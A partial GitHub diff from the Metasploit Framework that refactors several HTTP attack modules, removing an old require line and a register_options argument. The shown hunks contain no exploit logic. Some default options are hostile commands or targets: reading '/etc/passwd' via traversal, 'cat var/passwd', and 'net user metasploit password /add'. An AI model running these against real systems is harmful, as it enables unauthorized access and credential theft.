include Msf::Exploit::Remote::HttpClient
@ -47,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('USERNAME', [ true, 'The user to authenticate as', 'admin' ]),
OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),
OptString.new('PATH', [ true, 'The file to read or delete', "\\windows\\win.ini" ])
], self.class)
])
end
def run

1
modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb
View File

@ -3,7 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'bcrypt'
require 'digest'
require 'openssl'

4
modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -30,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
[
OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
OptString.new('URL', [ true, 'The path to mimencode', '/cgi-bin/ck/mimencode']),
], self.class)
])
end
def run_host(ip)

4
modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -37,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RPORT(80),
OptString.new('CMD', [ true, 'The command to execute', 'cat var/passwd'])
], self.class)
])
end
def run

2
modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient

2
modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient

2
modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient

4
modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
View File

@ -4,8 +4,6 @@
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
@ -37,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RPORT(8000),
OptString.new('CMD', [ false, "The command to execute.", "net user metasploit password /add" ]),
], self.class)
])
end
def run

4
modules/auxiliary/admin/http/iis_auth_bypass.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -36,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptString.new("TARGETURI", [true, 'The URI directory where basic auth is enabled', '/'])
], self.class)
])
end

4
modules/auxiliary/admin/http/intersil_pass_reset.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -41,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
[
OptString.new('TARGETURI', [ true, "The request URI", '/']),
OptString.new('PASSWORD', [true, 'The password to set', 'pass'])
], self.class)
])
end
def check

4
modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
View File

@ -4,8 +4,6 @@
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -30,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptInt.new('SID_MAX', [true, 'Maximum Session ID', 100])
], self.class)
])
end
def run

Some files were not shown because too many files have changed in this diff Show More